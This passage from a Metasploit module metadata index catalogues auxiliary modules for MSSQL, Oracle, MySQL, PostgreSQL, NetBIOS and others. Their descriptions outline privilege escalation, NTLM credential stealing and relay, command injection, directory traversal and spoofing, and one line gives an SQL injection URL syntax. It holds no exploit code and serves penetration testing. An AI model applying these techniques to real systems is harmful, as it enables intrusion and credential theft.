"URL-http://msdn.microsoft.com/en-us/library/ms174427.aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_sql_logins",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_dbowner": {
"name": "Microsoft SQL Server Escalate Db_Owner",
"full_name": "auxiliary/admin/mssql/mssql_escalate_dbowner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. Once\n the user has the sysadmin role the mssql_payload module can be used to obtain\n a shell on the system.",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_dbowner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_dbowner_sqli": {
"name": "Microsoft SQL Server SQLi Escalate Db_Owner",
"full_name": "auxiliary/admin/mssql/mssql_escalate_dbowner_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must have the db_owner role in\n a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_dbowner_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_execute_as": {
"name": "Microsoft SQL Server Escalate EXECUTE AS",
"full_name": "auxiliary/admin/mssql/mssql_escalate_execute_as",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_execute_as",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_escalate_execute_as_sqli": {
"name": "Microsoft SQL Server SQLi Escalate Execute AS",
"full_name": "auxiliary/admin/mssql/mssql_escalate_execute_as_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error-based SQL injection. In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_execute_as_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_exec": {
"name": "Microsoft SQL Server xp_cmdshell Command Execution",
"full_name": "auxiliary/admin/mssql/mssql_exec",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will execute a Windows command on an MSSQL/MSDE instance\n via the xp_cmdshell procedure. A valid username and password are required\n to use this module.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_findandsampledata": {
"name": "Microsoft SQL Server Find and Sample Data",
"full_name": "auxiliary/admin/mssql/mssql_findandsampledata",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Scott Sutherland <scott.sutherland@netspi.com>",
"Robin Wood <robin@digininja.org>",
"humble-desser <humble.desser@gmail.com>",
"Carlos Perez <carlos_perez@darkoperator.com>",
"hdm <x@hdm.io>",
"todb <todb@metasploit.com>"
],
"description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results\n are output in CSV format.",
"references": [
"URL-http://www.netspi.com/blog/author/ssutherland/"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_findandsampledata",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_idf": {
"name": "Microsoft SQL Server Interesting Data Finder",
"full_name": "auxiliary/admin/mssql/mssql_idf",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robin Wood <robin@digininja.org>"
],
"description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n The module has been tested against SQL Server 2005 but it should also work on\n SQL Server 2008. The module will not work against SQL Server 2000 at this time,\n if you are interested in supporting this platform, please contact the author.",
"references": [
"URL-http://www.digininja.org/metasploit/mssql_idf.php"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_idf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_ntlm_stealer": {
"name": "Microsoft SQL Server NTLM Stealer",
"full_name": "auxiliary/admin/mssql/mssql_ntlm_stealer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.",
"references": [
"URL-http://en.wikipedia.org/wiki/SMBRelay"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_ntlm_stealer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_ntlm_stealer_sqli": {
"name": "Microsoft SQL Server SQLi NTLM Stealer",
"full_name": "auxiliary/admin/mssql/mssql_ntlm_stealer_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>",
"Antti <antti.rantasaari@netspi.com>"
],
"description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" stored procedure. The stored procedure will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.",
"references": [
"URL-http://en.wikipedia.org/wiki/SMBRelay"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_ntlm_stealer_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_sql": {
"name": "Microsoft SQL Server Generic Query",
"full_name": "auxiliary/admin/mssql/mssql_sql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will allow for simple SQL statements to be executed against a\n MSSQL/MSDE instance given the appropriate credentials.",
"references": [
"URL-http://www.attackresearch.com",
"URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_sql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_sql_file": {
"name": "Microsoft SQL Server Generic Query from File",
"full_name": "auxiliary/admin/mssql/mssql_sql_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"j0hn__f : <jf@tinternet.org.uk>"
],
"description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_sql_file",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mysql/mysql_enum": {
"name": "MySQL Enumeration Module",
"full_name": "auxiliary/admin/mysql/mysql_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module allows for simple enumeration of MySQL Database Server\n provided proper credentials to connect remotely.",
"references": [
"URL-https://cisecurity.org/benchmarks.html"
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mysql/mysql_enum.rb",
"is_install_path": true,
"ref_name": "admin/mysql/mysql_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mysql/mysql_sql": {
"name": "MySQL SQL Generic Query",
"full_name": "auxiliary/admin/mysql/mysql_sql",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>"
],
"description": "This module allows for simple SQL statements to be executed\n against a MySQL instance given the appropriate credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mysql/mysql_sql.rb",
"is_install_path": true,
"ref_name": "admin/mysql/mysql_sql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/natpmp/natpmp_map": {
"name": "NAT-PMP Port Mapper",
"full_name": "auxiliary/admin/natpmp/natpmp_map",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Map (forward) TCP and UDP ports on NAT devices using NAT-PMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5351,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb",
"is_install_path": true,
"ref_name": "admin/natpmp/natpmp_map",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/netbios/netbios_spoof": {
"name": "NetBIOS Response Brute Force Spoof (Direct)",
"full_name": "auxiliary/admin/netbios/netbios_spoof",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"vvalien",
"hdm <x@hdm.io>",
"tombkeeper"
],
"description": "This module continuously spams NetBIOS responses to a target for a given hostname,\n causing the target to cache a malicious address for this name. On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.",
"references": [
],
"platform": "",
"arch": "",
"rport": 137,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb",
"is_install_path": true,
"ref_name": "admin/netbios/netbios_spoof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/officescan/tmlisten_traversal": {
"name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access",
"full_name": "auxiliary/admin/officescan/tmlisten_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Anshul Pandey <anshul999@gmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module tests for a directory traversal vulnerability in the UpdateAgent\n function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro\n OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM\n via dot dot sequences in an HTTP request.",
"references": [
"OSVDB-48730",
"CVE-2008-2439",
"BID-31531",
"URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt"
],
"platform": "",
"arch": "",
"rport": 26122,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb",
"is_install_path": true,
"ref_name": "admin/officescan/tmlisten_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/ora_ntlm_stealer": {
"name": "Oracle SMB Relay Code Execution",
"full_name": "auxiliary/admin/oracle/ora_ntlm_stealer",
"rank": 300,
"disclosure_date": "2009-04-07",
"type": "auxiliary",
"author": [
"Sh2kerr <research[ad]dsecrg.com>"
],
"description": "This module will help you to get Administrator access to the OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must first run the smb_sniffer or smb_relay module on your server.\n Then you must connect to the Oracle database and run this module (ora_ntlm_stealer.rb),\n which will connect to your SMB server with the credentials of the Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to the server which\n runs Oracle. If not, then you can decrypt the HALFLM hash.",
"references": [
"URL-http://dsecrg.com/pages/pub/show.php?id=17"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb",
"is_install_path": true,
"ref_name": "admin/oracle/ora_ntlm_stealer",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/oracle_index_privesc": {
"name": "Oracle DB Privilege Escalation via Function-Based Index",
"full_name": "auxiliary/admin/oracle/oracle_index_privesc",
"rank": 300,
"disclosure_date": "2015-01-21",
"type": "auxiliary",
"author": [
"David Litchfield",
"Moshe Kaplan"
],
"description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.",
"references": [
"URL-http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-10 11:21:16 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_index_privesc.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_index_privesc",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/oracle_login": {
"name": "Oracle Account Discovery",
"full_name": "auxiliary/admin/oracle/oracle_login",
"rank": 300,
"disclosure_date": "2008-11-20",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module uses a list of well known default authentication credentials\n to discover easily guessed accounts.",
"references": [
"URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv",
"URL-https://seclists.org/fulldisclosure/2009/Oct/261"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_login.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/oracle_sql": {
"name": "Oracle SQL Generic Query",
"full_name": "auxiliary/admin/oracle/oracle_sql",
"rank": 300,
"disclosure_date": "2007-12-07",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows for simple SQL statements to be executed\n against an Oracle instance given the appropriate credentials\n and sid.",
"references": [
"URL-https://www.metasploit.com/users/mc"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/oracle/oracle_sql.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oracle_sql",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/oraenum": {
"name": "Oracle Database Enumeration",
"full_name": "auxiliary/admin/oracle/oraenum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module provides a simple way to scan an Oracle database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.",
"references": [
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/oraenum.rb",
"is_install_path": true,
"ref_name": "admin/oracle/oraenum",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/osb_execqr": {
"name": "Oracle Secure Backup exec_qr() Command Injection Vulnerability",
"full_name": "auxiliary/admin/oracle/osb_execqr",
"rank": 300,
"disclosure_date": "2009-01-14",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.",
"references": [
"CVE-2008-5448",
"OSVDB-51342",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html",
"ZDI-09-003"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/osb_execqr2": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"full_name": "auxiliary/admin/oracle/osb_execqr2",
"rank": 300,
"disclosure_date": "2009-08-18",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).",
"references": [
"CVE-2009-1977",
"OSVDB-55903",
"CVE-2009-1978",
"OSVDB-55904",
"ZDI-09-058",
"ZDI-09-059"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/osb_execqr3": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"full_name": "auxiliary/admin/oracle/osb_execqr3",
"rank": 300,
"disclosure_date": "2010-07-13",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).",
"references": [
"CVE-2010-0904",
"OSVDB-66338",
"ZDI-10-118"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb",
"is_install_path": true,
"ref_name": "admin/oracle/osb_execqr3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/post_exploitation/win32exec": {
"name": "Oracle Java execCommand (Win32)",
"full_name": "auxiliary/admin/oracle/post_exploitation/win32exec",
"rank": 300,
"disclosure_date": "2007-12-07",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will create a Java class which enables the execution of OS commands.",
"references": [
"URL-https://www.metasploit.com/users/mc"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb",
"is_install_path": true,
"ref_name": "admin/oracle/post_exploitation/win32exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/post_exploitation/win32upload": {
"name": "Oracle URL Download",
"full_name": "auxiliary/admin/oracle/post_exploitation/win32upload",
"rank": 300,
"disclosure_date": "2005-02-10",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module will create a Java class which enables the download\n of a binary from a webserver to the Oracle filesystem.",
"references": [
"URL-http://www.argeniss.com/research/oraclesqlinj.zip"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb",
"is_install_path": true,
"ref_name": "admin/oracle/post_exploitation/win32upload",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/oracle/sid_brute": {
"name": "Oracle TNS Listener SID Brute Forcer",
"full_name": "auxiliary/admin/oracle/sid_brute",
"rank": 300,
"disclosure_date": "2009-01-07",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply attempts to discover the protected SID.",
"references": [
"URL-https://www.metasploit.com/users/mc",
"URL-http://www.red-database-security.com/scripts/sid.txt"
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/sid_brute.rb",
"is_install_path": true,
"ref_name": "admin/oracle/sid_brute",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/oracle/tnscmd": {
"name": "Oracle TNS Listener Command Issuer",
"full_name": "auxiliary/admin/oracle/tnscmd",
"rank": 300,
"disclosure_date": "2009-02-01",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows for the sending of arbitrary TNS commands in order\n to gather information.\n Inspired by tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/oracle/tnscmd.rb",
"is_install_path": true,
"ref_name": "admin/oracle/tnscmd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/pop2/uw_fileretrieval": {
"name": "UoW pop2d Remote File Retrieval Vulnerability",
"full_name": "auxiliary/admin/pop2/uw_fileretrieval",
"rank": 300,
"disclosure_date": "2000-07-14",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. The From address is\n the file owner.",
"references": [
"OSVDB-368",
"BID-1484"
],
"platform": "",
"arch": "",
"rport": 109,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb",
"is_install_path": true,
"ref_name": "admin/pop2/uw_fileretrieval",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/postgres/postgres_readfile": {
"name": "PostgreSQL Server Generic Query",
"full_name": "auxiliary/admin/postgres/postgres_readfile",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module imports a file local on the PostgreSQL Server into a\n temporary table, reads it, and then drops the temporary table.\n It requires PostgreSQL credentials with table CREATE privileges\n as well as read privileges to the target file.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb",
"is_install_path": true,
"ref_name": "admin/postgres/postgres_readfile",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/postgres/postgres_sql": {
"name": "PostgreSQL Server Generic Query",
"full_name": "auxiliary/admin/postgres/postgres_sql",
